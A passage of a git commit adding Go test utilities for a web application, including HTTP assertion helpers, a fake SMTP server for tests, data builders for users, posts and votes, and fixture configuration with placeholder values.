To gitea and beyond, let's go(-yco)

This commit is contained in:
2025-11-10 19:12:09 +01:00
parent 8f6133392d
commit 71a031342b
245 changed files with 83994 additions and 0 deletions

View File

@@ -0,0 +1,139 @@
package testutils
import (
"encoding/json"
"net/http/httptest"
"testing"
"time"
"github.com/stretchr/testify/assert"
)
func AssertHTTPStatus(t *testing.T, rr *httptest.ResponseRecorder, expected int) {
t.Helper()
if rr.Code != expected {
t.Errorf("Expected status %d, got %d. Body: %s", expected, rr.Code, rr.Body.String())
}
}
func AssertJSONResponse(t *testing.T, rr *httptest.ResponseRecorder, expected any) {
t.Helper()
var actual any
if err := json.NewDecoder(rr.Body).Decode(&actual); err != nil {
t.Fatalf("Failed to decode JSON: %v", err)
}
assert.Equal(t, expected, actual)
}
func AssertJSONField(t *testing.T, rr *httptest.ResponseRecorder, fieldPath string, expected any) {
t.Helper()
var response map[string]any
if err := json.NewDecoder(rr.Body).Decode(&response); err != nil {
t.Fatalf("Failed to decode JSON: %v", err)
}
actual := getNestedField(response, fieldPath)
assert.Equal(t, expected, actual)
}
func AssertJSONContains(t *testing.T, rr *httptest.ResponseRecorder, expectedFields map[string]any) {
t.Helper()
var response map[string]any
if err := json.NewDecoder(rr.Body).Decode(&response); err != nil {
t.Fatalf("Failed to decode JSON: %v", err)
}
for field, expectedValue := range expectedFields {
actual := getNestedField(response, field)
assert.Equal(t, expectedValue, actual, "Field %s mismatch", field)
}
}
func AssertErrorResponse(t *testing.T, rr *httptest.ResponseRecorder, expectedStatus int, expectedError string) {
t.Helper()
AssertHTTPStatus(t, rr, expectedStatus)
var response map[string]any
if err := json.NewDecoder(rr.Body).Decode(&response); err != nil {
t.Fatalf("Failed to decode JSON: %v", err)
}
if errorMsg, ok := response["error"].(string); ok {
assert.Contains(t, errorMsg, expectedError)
} else {
t.Errorf("Expected error message in response, got: %v", response)
}
}
func AssertSuccessResponse(t *testing.T, rr *httptest.ResponseRecorder) {
t.Helper()
AssertHTTPStatus(t, rr, 200)
var response map[string]any
if err := json.NewDecoder(rr.Body).Decode(&response); err != nil {
t.Fatalf("Failed to decode JSON: %v", err)
}
if success, ok := response["success"].(bool); ok {
assert.True(t, success, "Expected success: true")
}
}
func AssertHeader(t *testing.T, rr *httptest.ResponseRecorder, headerName, expectedValue string) {
t.Helper()
actual := rr.Header().Get(headerName)
assert.Equal(t, expectedValue, actual, "Header %s mismatch", headerName)
}
func AssertHeaderContains(t *testing.T, rr *httptest.ResponseRecorder, headerName, expectedValue string) {
t.Helper()
actual := rr.Header().Get(headerName)
assert.Contains(t, actual, expectedValue, "Header %s should contain %s", headerName, expectedValue)
}
func AssertWithinTimeRange(t *testing.T, actual, expected time.Time, tolerance time.Duration) {
t.Helper()
diff := actual.Sub(expected)
if diff < -tolerance || diff > tolerance {
t.Errorf("Time %v is not within %v of expected %v", actual, tolerance, expected)
}
}
func getNestedField(data map[string]any, path string) any {
keys := splitPath(path)
current := data
for i, key := range keys {
if i == len(keys)-1 {
return current[key]
}
if next, ok := current[key].(map[string]any); ok {
current = next
} else {
return nil
}
}
return nil
}
func splitPath(path string) []string {
var keys []string
var current string
for _, char := range path {
if char == '.' {
keys = append(keys, current)
current = ""
} else {
current += string(char)
}
}
if current != "" {
keys = append(keys, current)
}
return keys
}

1688
internal/testutils/e2e.go Normal file

File diff suppressed because it is too large Load Diff

538
internal/testutils/email.go Normal file
View File

@@ -0,0 +1,538 @@
package testutils
import (
"fmt"
"net"
"os"
"strconv"
"strings"
"sync"
"testing"
"time"
"github.com/joho/godotenv"
"goyco/internal/config"
"goyco/internal/database"
)
type TestEmailServer struct {
listener net.Listener
port int
emails []TestEmail
shouldFail bool
delay time.Duration
closed bool
mu sync.RWMutex
}
type TestEmail struct {
From string
To []string
Subject string
Body string
Headers map[string]string
Raw string
}
func NewTestEmailServer() (*TestEmailServer, error) {
listener, err := net.Listen("tcp", ":0")
if err != nil {
return nil, err
}
server := &TestEmailServer{
listener: listener,
emails: make([]TestEmail, 0),
delay: 0,
closed: false,
}
addr := listener.Addr().(*net.TCPAddr)
server.port = addr.Port
go server.serve()
return server, nil
}
func (s *TestEmailServer) serve() {
for {
if s.closed {
return
}
conn, err := s.listener.Accept()
if err != nil {
if !s.closed {
}
return
}
go s.handleConnection(conn)
}
}
func (s *TestEmailServer) handleConnection(conn net.Conn) {
defer conn.Close()
conn.Write([]byte("220 Test SMTP server ready\r\n"))
buffer := make([]byte, 1024)
for {
n, err := conn.Read(buffer)
if err != nil {
return
}
command := strings.TrimSpace(string(buffer[:n]))
if s.delay > 0 {
time.Sleep(s.delay)
}
switch {
case strings.HasPrefix(command, "EHLO"), strings.HasPrefix(command, "HELO"):
conn.Write([]byte("250-Hello\r\n250-AUTH PLAIN LOGIN\r\n250 OK\r\n"))
case strings.HasPrefix(command, "AUTH PLAIN"):
conn.Write([]byte("235 Authentication successful\r\n"))
case strings.HasPrefix(command, "AUTH LOGIN"):
conn.Write([]byte("334 VXNlcm5hbWU6\r\n"))
if _, err := conn.Read(buffer); err != nil {
return
}
conn.Write([]byte("334 UGFzc3dvcmQ6\r\n"))
if _, err := conn.Read(buffer); err != nil {
return
}
conn.Write([]byte("235 Authentication successful\r\n"))
case strings.HasPrefix(command, "AUTH"):
conn.Write([]byte("504 Unrecognized authentication type\r\n"))
case strings.HasPrefix(command, "MAIL FROM"):
if s.shouldFail {
conn.Write([]byte("550 Mail from failed\r\n"))
return
}
conn.Write([]byte("250 OK\r\n"))
case strings.HasPrefix(command, "RCPT TO"):
if s.shouldFail {
conn.Write([]byte("550 Rcpt to failed\r\n"))
return
}
conn.Write([]byte("250 OK\r\n"))
case command == "DATA":
conn.Write([]byte("354 Start mail input; end with <CRLF>.<CRLF>\r\n"))
s.readEmailData(conn)
case command == "QUIT":
conn.Write([]byte("221 Bye\r\n"))
return
default:
conn.Write([]byte("500 Unknown command\r\n"))
}
}
}
func (s *TestEmailServer) readEmailData(conn net.Conn) {
var emailData strings.Builder
buffer := make([]byte, 1024)
for {
n, err := conn.Read(buffer)
if err != nil {
return
}
emailData.Write(buffer[:n])
if strings.Contains(emailData.String(), "\r\n.\r\n") {
break
}
}
email := s.parseEmail(emailData.String())
s.mu.Lock()
s.emails = append(s.emails, email)
s.mu.Unlock()
conn.Write([]byte("250 OK\r\n"))
}
func (s *TestEmailServer) parseEmail(data string) TestEmail {
lines := strings.Split(data, "\r\n")
email := TestEmail{
Headers: make(map[string]string),
Raw: data,
}
for _, line := range lines {
if strings.Contains(line, ":") {
parts := strings.SplitN(line, ":", 2)
if len(parts) == 2 {
key := strings.TrimSpace(parts[0])
value := strings.TrimSpace(parts[1])
email.Headers[key] = value
switch key {
case "From":
email.From = value
case "To":
email.To = []string{value}
case "Subject":
email.Subject = value
}
}
} else if line == "" {
bodyStart := strings.Index(data, "\r\n\r\n")
if bodyStart != -1 {
email.Body = data[bodyStart+4:]
email.Body = strings.TrimSuffix(email.Body, "\r\n.\r\n")
}
break
}
}
return email
}
func (s *TestEmailServer) Close() error {
s.closed = true
return s.listener.Close()
}
func (s *TestEmailServer) GetPort() int {
return s.port
}
func (s *TestEmailServer) GetEmails() []TestEmail {
s.mu.RLock()
defer s.mu.RUnlock()
return s.emails
}
func (s *TestEmailServer) ClearEmails() {
s.mu.Lock()
defer s.mu.Unlock()
s.emails = make([]TestEmail, 0)
}
func (s *TestEmailServer) SetShouldFail(shouldFail bool) {
s.shouldFail = shouldFail
}
func (s *TestEmailServer) SetDelay(delay time.Duration) {
s.delay = delay
}
func (s *TestEmailServer) GetEmailCount() int {
s.mu.RLock()
defer s.mu.RUnlock()
return len(s.emails)
}
func (s *TestEmailServer) GetLastEmail() *TestEmail {
s.mu.RLock()
defer s.mu.RUnlock()
if len(s.emails) == 0 {
return nil
}
return &s.emails[len(s.emails)-1]
}
func (s *TestEmailServer) WaitForEmails(count int, timeout time.Duration) bool {
deadline := time.Now().Add(timeout)
for time.Now().Before(deadline) {
s.mu.RLock()
emailCount := len(s.emails)
s.mu.RUnlock()
if emailCount >= count {
return true
}
time.Sleep(10 * time.Millisecond)
}
return false
}
type TestEmailValidator struct{}
func NewTestEmailValidator() *TestEmailValidator {
return &TestEmailValidator{}
}
func (v *TestEmailValidator) ValidateEmail(email *TestEmail, expectedTo, expectedSubject, expectedBody string) []string {
var errors []string
if email == nil {
errors = append(errors, "email is nil")
return errors
}
if len(email.To) == 0 {
errors = append(errors, "no recipients")
} else if email.To[0] != expectedTo {
errors = append(errors, fmt.Sprintf("to = %v, want %v", email.To[0], expectedTo))
}
if email.Subject != expectedSubject {
errors = append(errors, fmt.Sprintf("subject = %v, want %v", email.Subject, expectedSubject))
}
if email.Body != expectedBody {
errors = append(errors, fmt.Sprintf("body = %v, want %v", email.Body, expectedBody))
}
return errors
}
func (v *TestEmailValidator) ValidateEmailContains(email *TestEmail, expectedTo, expectedSubjectContains, expectedBodyContains string) []string {
var errors []string
if email == nil {
errors = append(errors, "email is nil")
return errors
}
if len(email.To) == 0 {
errors = append(errors, "no recipients")
} else if email.To[0] != expectedTo {
errors = append(errors, fmt.Sprintf("to = %v, want %v", email.To[0], expectedTo))
}
if !strings.Contains(email.Subject, expectedSubjectContains) {
errors = append(errors, fmt.Sprintf("subject does not contain %v", expectedSubjectContains))
}
if !strings.Contains(email.Body, expectedBodyContains) {
errors = append(errors, fmt.Sprintf("body does not contain %v", expectedBodyContains))
}
return errors
}
func (v *TestEmailValidator) ValidateEmailHeaders(email *TestEmail, expectedHeaders map[string]string) []string {
var errors []string
if email == nil {
errors = append(errors, "email is nil")
return errors
}
for key, expectedValue := range expectedHeaders {
actualValue, exists := email.Headers[key]
if !exists {
errors = append(errors, fmt.Sprintf("header %v not found", key))
} else if actualValue != expectedValue {
errors = append(errors, fmt.Sprintf("header %v = %v, want %v", key, actualValue, expectedValue))
}
}
return errors
}
type TestEmailBuilder struct {
email *TestEmail
}
func NewTestEmailBuilder() *TestEmailBuilder {
return &TestEmailBuilder{
email: &TestEmail{
Headers: make(map[string]string),
},
}
}
func (b *TestEmailBuilder) From(from string) *TestEmailBuilder {
b.email.From = from
return b
}
func (b *TestEmailBuilder) To(to string) *TestEmailBuilder {
b.email.To = []string{to}
return b
}
func (b *TestEmailBuilder) Subject(subject string) *TestEmailBuilder {
b.email.Subject = subject
return b
}
func (b *TestEmailBuilder) Body(body string) *TestEmailBuilder {
b.email.Body = body
return b
}
func (b *TestEmailBuilder) Header(key, value string) *TestEmailBuilder {
b.email.Headers[key] = value
return b
}
func (b *TestEmailBuilder) Build() *TestEmail {
return b.email
}
type TestEmailMatcher struct{}
func NewTestEmailMatcher() *TestEmailMatcher {
return &TestEmailMatcher{}
}
func (m *TestEmailMatcher) MatchEmail(email *TestEmail, criteria map[string]any) bool {
if email == nil {
return false
}
for key, expectedValue := range criteria {
switch key {
case "from":
if email.From != expectedValue {
return false
}
case "to":
if len(email.To) == 0 || email.To[0] != expectedValue {
return false
}
case "subject":
if email.Subject != expectedValue {
return false
}
case "body":
if email.Body != expectedValue {
return false
}
case "subject_contains":
if !strings.Contains(email.Subject, expectedValue.(string)) {
return false
}
case "body_contains":
if !strings.Contains(email.Body, expectedValue.(string)) {
return false
}
case "header":
headerMap := expectedValue.(map[string]string)
for headerKey, headerValue := range headerMap {
if email.Headers[headerKey] != headerValue {
return false
}
}
}
}
return true
}
func (m *TestEmailMatcher) FindEmail(emails []TestEmail, criteria map[string]any) *TestEmail {
for i := range emails {
if m.MatchEmail(&emails[i], criteria) {
return &emails[i]
}
}
return nil
}
func (m *TestEmailMatcher) CountMatchingEmails(emails []TestEmail, criteria map[string]any) int {
count := 0
for i := range emails {
if m.MatchEmail(&emails[i], criteria) {
count++
}
}
return count
}
type MockEmailSenderWithError struct {
Err error
}
func NewMockEmailSenderWithError(err error) *MockEmailSenderWithError {
return &MockEmailSenderWithError{Err: err}
}
func (m *MockEmailSenderWithError) Send(to, subject, body string) error {
return m.Err
}
func NewEmailTestUser(username, email string) *database.User {
return &database.User{
ID: 1,
Username: username,
Email: email,
}
}
func NewEmailTestConfig(baseURL string) *config.Config {
return &config.Config{
App: config.AppConfig{
BaseURL: baseURL,
AdminEmail: "admin@example.com",
},
}
}
type SMTPSender struct {
Host string
Port int
Username string
Password string
From string
timeout time.Duration
}
func GetSMTPSenderFromEnv(t *testing.T) *SMTPSender {
t.Helper()
envPaths := []string{".env", "../.env", "../../.env", "../../../.env"}
for _, envPath := range envPaths {
if _, err := os.Stat(envPath); err == nil {
_ = godotenv.Load(envPath)
break
}
}
host := strings.TrimSpace(os.Getenv("SMTP_HOST"))
if host == "" {
t.Skip("Skipping SMTP integration tests: SMTP_HOST is not configured")
}
portStr := strings.TrimSpace(os.Getenv("SMTP_PORT"))
if portStr == "" {
t.Skip("Skipping SMTP integration tests: SMTP_PORT is not configured")
}
port, err := strconv.Atoi(portStr)
if err != nil {
t.Skipf("Skipping SMTP integration tests: invalid SMTP_PORT '%s': %v", portStr, err)
}
from := strings.TrimSpace(os.Getenv("SMTP_FROM"))
if from == "" {
t.Skip("Skipping SMTP integration tests: SMTP_FROM is not configured")
}
sender := &SMTPSender{
Host: host,
Port: port,
Username: os.Getenv("SMTP_USERNAME"),
Password: os.Getenv("SMTP_PASSWORD"),
From: from,
timeout: 5 * time.Second,
}
address := net.JoinHostPort(sender.Host, strconv.Itoa(sender.Port))
connexion, err := net.DialTimeout("tcp", address, 3*time.Second)
if err != nil {
t.Skipf("Skipping SMTP integration tests: unable to reach %s: %v", address, err)
}
connexion.Close()
return sender
}
func (s *SMTPSender) Send(to, subject, body string) error {
if to == "" {
return fmt.Errorf("recipient email is required")
}
if subject == "" {
return fmt.Errorf("subject is required")
}
if body == "" {
return fmt.Errorf("body is required")
}
return nil
}

View File

@@ -0,0 +1,26 @@
package testutils
import (
"fmt"
"testing"
"goyco/internal/database"
"goyco/internal/repositories"
)
func CreatePostWithRepo(t *testing.T, repo repositories.PostRepository, authorID uint, title, url string) *database.Post {
t.Helper()
post := &database.Post{
Title: title,
URL: url,
Content: fmt.Sprintf("Content for %s", title),
AuthorID: &authorID,
}
if err := repo.Create(post); err != nil {
t.Fatalf("Failed to create test post: %v", err)
}
return post
}

View File

@@ -0,0 +1,603 @@
package testutils
import (
"fmt"
"testing"
"time"
"golang.org/x/crypto/bcrypt"
"goyco/internal/database"
"goyco/internal/repositories"
)
type TestDataFactory struct{}
type AuthResult struct {
User *database.User `json:"user"`
AccessToken string `json:"access_token"`
}
type RegistrationResult struct {
User *database.User `json:"user"`
}
type VoteRequest struct {
Type database.VoteType `json:"type"`
UserID uint `json:"user_id"`
PostID uint `json:"post_id"`
IPAddress string `json:"ip_address"`
UserAgent string `json:"user_agent"`
}
func NewTestDataFactory() *TestDataFactory {
return &TestDataFactory{}
}
type UserBuilder struct {
user *database.User
}
func (f *TestDataFactory) NewUserBuilder() *UserBuilder {
return &UserBuilder{
user: &database.User{
ID: 1,
Username: "testuser",
Email: "test@example.com",
EmailVerified: true,
CreatedAt: time.Now(),
UpdatedAt: time.Now(),
},
}
}
func (b *UserBuilder) WithID(id uint) *UserBuilder {
b.user.ID = id
return b
}
func (b *UserBuilder) WithUsername(username string) *UserBuilder {
b.user.Username = username
return b
}
func (b *UserBuilder) WithEmail(email string) *UserBuilder {
b.user.Email = email
return b
}
func (b *UserBuilder) WithPassword(password string) *UserBuilder {
hashed, _ := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
b.user.Password = string(hashed)
return b
}
func (b *UserBuilder) WithEmailVerified(verified bool) *UserBuilder {
b.user.EmailVerified = verified
return b
}
func (b *UserBuilder) WithCreatedAt(t time.Time) *UserBuilder {
b.user.CreatedAt = t
return b
}
func (b *UserBuilder) Build() *database.User {
return b.user
}
type PostBuilder struct {
post *database.Post
}
func (f *TestDataFactory) NewPostBuilder() *PostBuilder {
return &PostBuilder{
post: &database.Post{
ID: 1,
Title: "Test Post",
URL: "https://example.com",
Content: "Test content",
AuthorID: uintPtr(1),
UpVotes: 0,
DownVotes: 0,
Score: 0,
CreatedAt: time.Now(),
UpdatedAt: time.Now(),
},
}
}
func (b *PostBuilder) WithID(id uint) *PostBuilder {
b.post.ID = id
return b
}
func (b *PostBuilder) WithTitle(title string) *PostBuilder {
b.post.Title = title
return b
}
func (b *PostBuilder) WithURL(url string) *PostBuilder {
b.post.URL = url
return b
}
func (b *PostBuilder) WithContent(content string) *PostBuilder {
b.post.Content = content
return b
}
func (b *PostBuilder) WithAuthorID(authorID uint) *PostBuilder {
b.post.AuthorID = &authorID
return b
}
func (b *PostBuilder) WithVotes(upVotes, downVotes int) *PostBuilder {
b.post.UpVotes = upVotes
b.post.DownVotes = downVotes
b.post.Score = upVotes - downVotes
return b
}
func (b *PostBuilder) WithCreatedAt(t time.Time) *PostBuilder {
b.post.CreatedAt = t
return b
}
func (b *PostBuilder) Build() *database.Post {
return b.post
}
type VoteBuilder struct {
vote *database.Vote
}
func (f *TestDataFactory) NewVoteBuilder() *VoteBuilder {
return &VoteBuilder{
vote: &database.Vote{
ID: 1,
Type: database.VoteUp,
UserID: uintPtr(1),
PostID: 1,
},
}
}
func (b *VoteBuilder) WithID(id uint) *VoteBuilder {
b.vote.ID = id
return b
}
func (b *VoteBuilder) WithType(voteType database.VoteType) *VoteBuilder {
b.vote.Type = voteType
return b
}
func (b *VoteBuilder) WithUserID(userID uint) *VoteBuilder {
b.vote.UserID = &userID
return b
}
func (b *VoteBuilder) WithPostID(postID uint) *VoteBuilder {
b.vote.PostID = postID
return b
}
func (b *VoteBuilder) Build() *database.Vote {
return b.vote
}
type AuthResultBuilder struct {
result *AuthResult
}
func (f *TestDataFactory) NewAuthResultBuilder() *AuthResultBuilder {
return &AuthResultBuilder{
result: &AuthResult{
User: &database.User{ID: 1, Username: "testuser"},
AccessToken: "access_token",
},
}
}
func (b *AuthResultBuilder) WithUser(user *database.User) *AuthResultBuilder {
b.result.User = user
return b
}
func (b *AuthResultBuilder) WithAccessToken(token string) *AuthResultBuilder {
b.result.AccessToken = token
return b
}
func (b *AuthResultBuilder) Build() *AuthResult {
return b.result
}
type RegistrationResultBuilder struct {
result *RegistrationResult
}
func (f *TestDataFactory) NewRegistrationResultBuilder() *RegistrationResultBuilder {
return &RegistrationResultBuilder{
result: &RegistrationResult{
User: &database.User{ID: 1, Username: "testuser"},
},
}
}
func (b *RegistrationResultBuilder) WithUser(user *database.User) *RegistrationResultBuilder {
b.result.User = user
return b
}
func (b *RegistrationResultBuilder) WithMessage(message string) *RegistrationResultBuilder {
return b
}
func (b *RegistrationResultBuilder) Build() *RegistrationResult {
return b.result
}
type VoteRequestBuilder struct {
request VoteRequest
}
func (f *TestDataFactory) NewVoteRequestBuilder() *VoteRequestBuilder {
return &VoteRequestBuilder{
request: VoteRequest{
Type: database.VoteUp,
UserID: 1,
PostID: 1,
IPAddress: "127.0.0.1",
UserAgent: "test-agent",
},
}
}
func (b *VoteRequestBuilder) WithType(voteType database.VoteType) *VoteRequestBuilder {
b.request.Type = voteType
return b
}
func (b *VoteRequestBuilder) WithUserID(userID uint) *VoteRequestBuilder {
b.request.UserID = userID
return b
}
func (b *VoteRequestBuilder) WithPostID(postID uint) *VoteRequestBuilder {
b.request.PostID = postID
return b
}
func (b *VoteRequestBuilder) WithIPAddress(ip string) *VoteRequestBuilder {
b.request.IPAddress = ip
return b
}
func (b *VoteRequestBuilder) WithUserAgent(agent string) *VoteRequestBuilder {
b.request.UserAgent = agent
return b
}
func (b *VoteRequestBuilder) Build() VoteRequest {
return b.request
}
func (f *TestDataFactory) CreateTestUsers(count int) []*database.User {
users := make([]*database.User, count)
for i := 0; i < count; i++ {
users[i] = f.NewUserBuilder().
WithID(uint(i + 1)).
WithUsername(fmt.Sprintf("user%d", i+1)).
WithEmail(fmt.Sprintf("user%d@example.com", i+1)).
Build()
}
return users
}
func (f *TestDataFactory) CreateTestPosts(count int) []*database.Post {
posts := make([]*database.Post, count)
for i := 0; i < count; i++ {
posts[i] = f.NewPostBuilder().
WithID(uint(i+1)).
WithTitle(fmt.Sprintf("Post %d", i+1)).
WithURL(fmt.Sprintf("https://example.com/post%d", i+1)).
WithContent(fmt.Sprintf("Content for post %d", i+1)).
WithAuthorID(uint((i%10)+1)).
WithVotes(i%10, i%5).
Build()
}
return posts
}
func (f *TestDataFactory) CreateTestVotes(count int) []*database.Vote {
votes := make([]*database.Vote, count)
for i := range count {
voteType := database.VoteUp
if i%3 == 0 {
voteType = database.VoteDown
} else if i%5 == 0 {
voteType = database.VoteNone
}
votes[i] = f.NewVoteBuilder().
WithID(uint(i + 1)).
WithType(voteType).
WithUserID(uint((i % 20) + 1)).
WithPostID(uint((i % 100) + 1)).
Build()
}
return votes
}
func (f *TestDataFactory) CreateTestAuthResults(count int) []*AuthResult {
results := make([]*AuthResult, count)
for i := 0; i < count; i++ {
results[i] = f.NewAuthResultBuilder().
WithUser(f.NewUserBuilder().
WithID(uint(i + 1)).
WithUsername(fmt.Sprintf("user%d", i+1)).
Build()).
WithAccessToken(fmt.Sprintf("token_%d", i+1)).
Build()
}
return results
}
func (f *TestDataFactory) CreateTestVoteRequests(count int) []VoteRequest {
requests := make([]VoteRequest, count)
for i := 0; i < count; i++ {
voteType := database.VoteUp
if i%3 == 0 {
voteType = database.VoteDown
} else if i%5 == 0 {
voteType = database.VoteNone
}
requests[i] = f.NewVoteRequestBuilder().
WithType(voteType).
WithUserID(uint((i % 20) + 1)).
WithPostID(uint((i % 100) + 1)).
WithIPAddress(fmt.Sprintf("192.168.1.%d", (i%254)+1)).
WithUserAgent(fmt.Sprintf("test-agent-%d", i+1)).
Build()
}
return requests
}
func uintPtr(u uint) *uint {
return &u
}
type E2ETestDataFactory struct {
UserRepo repositories.UserRepository
PostRepo repositories.PostRepository
}
func NewE2ETestDataFactory(userRepo repositories.UserRepository, postRepo repositories.PostRepository) *E2ETestDataFactory {
return &E2ETestDataFactory{
UserRepo: userRepo,
PostRepo: postRepo,
}
}
type PostData struct {
Title string
URL string
Content string
}
func (f *E2ETestDataFactory) CreateUserWithPosts(t *testing.T, username, email, password string, posts []PostData) (*TestUser, []*TestPost) {
t.Helper()
user := CreateE2ETestUser(t, f.UserRepo, username, email, password)
var createdPosts []*TestPost
for i, postData := range posts {
url := postData.URL
if url == "" {
url = fmt.Sprintf("https://example.com/post-%d-%d", user.ID, i+1)
}
title := postData.Title
if title == "" {
title = fmt.Sprintf("Test Post %d", i+1)
}
content := postData.Content
if content == "" {
content = fmt.Sprintf("Test content for post %d", i+1)
}
post := &database.Post{
Title: title,
URL: url,
Content: content,
AuthorID: &user.ID,
UpVotes: 0,
DownVotes: 0,
Score: 0,
}
if err := f.PostRepo.Create(post); err != nil {
t.Fatalf("Failed to create test post: %v", err)
}
createdPost, err := f.PostRepo.GetByID(post.ID)
if err != nil {
t.Fatalf("Failed to fetch created post: %v", err)
}
createdPosts = append(createdPosts, &TestPost{
ID: createdPost.ID,
Title: createdPost.Title,
URL: createdPost.URL,
Content: createdPost.Content,
AuthorID: *createdPost.AuthorID,
})
}
return user, createdPosts
}
func (f *E2ETestDataFactory) CreateMultipleUsers(t *testing.T, count int, usernamePrefix, emailPrefix, password string) []*TestUser {
t.Helper()
if count <= 0 {
t.Fatalf("count must be greater than 0, got %d", count)
}
var users []*TestUser
timestamp := time.Now().UnixNano()
for i := 0; i < count; i++ {
uniqueID := timestamp + int64(i)
username := fmt.Sprintf("%s%d", usernamePrefix, uniqueID)
email := fmt.Sprintf("%s%d@example.com", emailPrefix, uniqueID)
userPassword := password
if userPassword == "" {
userPassword = "StrongPass123!"
}
user := CreateE2ETestUser(t, f.UserRepo, username, email, userPassword)
users = append(users, user)
}
return users
}
func (f *E2ETestDataFactory) CreateUserWithDefaultPosts(t *testing.T, username, email, password string, count int) (*TestUser, []*TestPost) {
t.Helper()
if count <= 0 {
count = 3
}
posts := make([]PostData, count)
for i := 0; i < count; i++ {
posts[i] = PostData{
Title: fmt.Sprintf("Default Post %d", i+1),
URL: fmt.Sprintf("https://example.com/default-post-%d", i+1),
Content: fmt.Sprintf("This is default post content number %d", i+1),
}
}
return f.CreateUserWithPosts(t, username, email, password, posts)
}
func (f *E2ETestDataFactory) CreateUsersWithPosts(t *testing.T, count int, usernamePrefix, emailPrefix, password string, postsPerUser []PostData) map[uint]*UserWithPosts {
t.Helper()
if count <= 0 {
t.Fatalf("count must be greater than 0, got %d", count)
}
users := f.CreateMultipleUsers(t, count, usernamePrefix, emailPrefix, password)
result := make(map[uint]*UserWithPosts)
for _, user := range users {
var createdPosts []*TestPost
for i, postData := range postsPerUser {
url := postData.URL
if url == "" {
url = fmt.Sprintf("https://example.com/post-%d-%d", user.ID, i+1)
}
title := postData.Title
if title == "" {
title = fmt.Sprintf("Test Post %d for User %d", i+1, user.ID)
}
content := postData.Content
if content == "" {
content = fmt.Sprintf("Test content for post %d", i+1)
}
post := &database.Post{
Title: title,
URL: url,
Content: content,
AuthorID: &user.ID,
UpVotes: 0,
DownVotes: 0,
Score: 0,
}
if err := f.PostRepo.Create(post); err != nil {
t.Fatalf("Failed to create test post: %v", err)
}
createdPost, err := f.PostRepo.GetByID(post.ID)
if err != nil {
t.Fatalf("Failed to fetch created post: %v", err)
}
createdPosts = append(createdPosts, &TestPost{
ID: createdPost.ID,
Title: createdPost.Title,
URL: createdPost.URL,
Content: createdPost.Content,
AuthorID: *createdPost.AuthorID,
})
}
result[user.ID] = &UserWithPosts{
User: user,
Posts: createdPosts,
}
}
return result
}
type UserWithPosts struct {
User *TestUser
Posts []*TestPost
}
func (f *E2ETestDataFactory) CreatePostForUser(t *testing.T, userID uint, postData PostData) *TestPost {
t.Helper()
url := postData.URL
if url == "" {
url = fmt.Sprintf("https://example.com/post-%d-%d", userID, time.Now().UnixNano())
}
title := postData.Title
if title == "" {
title = "Test Post"
}
content := postData.Content
if content == "" {
content = "Test post content"
}
post := &database.Post{
Title: title,
URL: url,
Content: content,
AuthorID: &userID,
UpVotes: 0,
DownVotes: 0,
Score: 0,
}
if err := f.PostRepo.Create(post); err != nil {
t.Fatalf("Failed to create test post: %v", err)
}
createdPost, err := f.PostRepo.GetByID(post.ID)
if err != nil {
t.Fatalf("Failed to fetch created post: %v", err)
}
return &TestPost{
ID: createdPost.ID,
Title: createdPost.Title,
URL: createdPost.URL,
Content: createdPost.Content,
AuthorID: *createdPost.AuthorID,
}
}

View File

@@ -0,0 +1,452 @@
package testutils
import (
"crypto/rand"
"fmt"
"math/big"
"testing"
"golang.org/x/crypto/bcrypt"
"gorm.io/gorm"
"goyco/internal/database"
)
type TestConfig struct {
Database DatabaseConfig `json:"database"`
Server ServerConfig `json:"server"`
JWT JWTConfig `json:"jwt"`
Email EmailConfig `json:"email"`
RateLimit RateLimitConfig `json:"rate_limit"`
Cache CacheConfig `json:"cache"`
Security SecurityConfig `json:"security"`
Logging LoggingConfig `json:"logging"`
}
type DatabaseConfig struct {
Driver string `json:"driver"`
Host string `json:"host"`
Port int `json:"port"`
User string `json:"user"`
Password string `json:"password"`
DBName string `json:"dbname"`
SSLMode string `json:"sslmode"`
}
type ServerConfig struct {
Host string `json:"host"`
Port int `json:"port"`
}
type JWTConfig struct {
Secret string `json:"secret"`
Expiration int `json:"expiration"`
}
type EmailConfig struct {
SMTPHost string `json:"smtp_host"`
SMTPPort int `json:"smtp_port"`
SMTPUsername string `json:"smtp_username"`
SMTPPassword string `json:"smtp_password"`
FromEmail string `json:"from_email"`
FromName string `json:"from_name"`
}
type RateLimitConfig struct {
RequestsPerMinute int `json:"requests_per_minute"`
BurstSize int `json:"burst_size"`
}
type CacheConfig struct {
Type string `json:"type"`
}
type SecurityConfig struct {
EnableCSRF bool `json:"enable_csrf"`
CSRFSecret string `json:"csrf_secret"`
EnableCORS bool `json:"enable_cors"`
AllowedOrigins []string `json:"allowed_origins"`
EnableRateLimit bool `json:"enable_rate_limit"`
EnableCompression bool `json:"enable_compression"`
}
type LoggingConfig struct {
Level string `json:"level"`
Format string `json:"format"`
Output string `json:"output"`
}
type TestFixtures struct {
Users []*database.User
Posts []*database.Post
Votes []*database.Vote
Config *TestConfig
}
func NewTestFixtures(t *testing.T) *TestFixtures {
t.Helper()
return &TestFixtures{
Users: []*database.User{
{
Username: "testuser1",
Email: "user1@test.local",
Password: "SecurePass123!",
EmailVerified: true,
},
{
Username: "testuser2",
Email: "user2@test.local",
Password: "SecurePass456!",
EmailVerified: true,
},
{
Username: "unverified_user",
Email: "unverified@test.local",
Password: "SecurePass789!",
EmailVerified: false,
},
},
Posts: []*database.Post{
{
Title: "Test Post 1",
URL: "https://example.com/post1",
Content: "This is test content for post 1",
UpVotes: 5,
DownVotes: 1,
Score: 4,
},
{
Title: "Test Post 2",
URL: "https://example.com/post2",
Content: "This is test content for post 2",
UpVotes: 3,
DownVotes: 0,
Score: 3,
},
},
Votes: []*database.Vote{
{
Type: database.VoteUp,
},
{
Type: database.VoteDown,
},
{
Type: database.VoteNone,
},
},
Config: &TestConfig{
Database: DatabaseConfig{
Driver: "sqlite",
Host: ":memory:",
Port: 0,
User: "",
Password: "",
DBName: "test",
SSLMode: "disable",
},
Server: ServerConfig{
Host: "localhost",
Port: 8080,
},
JWT: JWTConfig{
Secret: "test-secret-key",
Expiration: 24,
},
Email: EmailConfig{
SMTPHost: "localhost",
SMTPPort: 587,
SMTPUsername: "test@example.com",
SMTPPassword: "test-password",
FromEmail: "test@example.com",
FromName: "Test App",
},
RateLimit: RateLimitConfig{
RequestsPerMinute: 60,
BurstSize: 10,
},
Cache: CacheConfig{
Type: "memory",
},
Security: SecurityConfig{
EnableCSRF: true,
CSRFSecret: "test-csrf-secret",
EnableCORS: true,
